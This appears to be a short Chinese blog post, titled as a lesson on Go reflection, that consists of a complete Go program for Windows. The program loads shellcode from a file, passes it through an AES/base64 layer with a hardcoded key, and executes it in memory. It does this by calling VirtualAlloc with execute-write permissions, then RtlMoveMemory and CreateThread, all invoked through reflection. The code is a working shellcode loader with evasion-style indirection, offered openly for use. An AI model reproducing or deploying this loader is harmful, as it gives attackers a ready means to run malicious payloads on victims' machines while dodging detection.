Go语言反射技术:使用反射调用函数执行字节码
package main
import ( "crypto/aes" "crypto/cipher" "encoding/base64" "io/ioutil" "reflect" "syscall" "time" "unsafe" )
const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 )
var AesKey = []byte{ 0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B, 0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B, 0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B, }
type CipherFunc func(key []byte, src []byte) []byte
func AesCipher(key []byte, src []byte) []byte { block, _ := aes.NewCipher(key) iv := make([]byte, aes.BlockSize) stream := cipher.NewCTR(block, iv) dst := make([]byte, len(src)) stream.XORKeyStream(dst, src) return dst }
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte { return cipher(key, src) }
func Encode(src string) string { payloadBytes := []byte(src) encodedBytes := Crypt(AesCipher, AesKey, payloadBytes) bdata := base64.StdEncoding.EncodeToString(encodedBytes) return bdata }
func Decode(src string) []byte { decodedBytes, _ := base64.StdEncoding.DecodeString(src) payloadBytes := Crypt(AesCipher, AesKey, decodedBytes) return payloadBytes }
var ( kernel32 = syscall.NewLazyDLL('kernel32.dll') ntdll = syscall.NewLazyDLL('ntdll.dll') VirtualAlloc = kernel32.NewProc('VirtualAlloc') RtlMoveMemory = ntdll.NewProc('RtlMoveMemory') CreateThread = kernel32.NewProc('CreateThread') )
func exec(charcode []byte) { addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) time.Sleep(5) _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) time.Sleep(5) handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0) time.Sleep(5) syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE) }
func readFile(filename string) []byte { data, _ := ioutil.ReadFile(filename) return data }
func main() { payload := string(readFile('./payload.bin')) encodedPayload := Encode(payload) shellCodeHex := Decode(encodedPayload)
// 获取函数指针
execFunc := reflect.ValueOf(exec)
// 将字节切片转换为 reflect.Value 类型
params := []reflect.Value{reflect.ValueOf(shellCodeHex)}
// 调用函数
execFunc.Call(params)
}
原文地址: https://www.cveoy.top/t/topic/lKNg 著作权归作者所有。请勿转载和采集!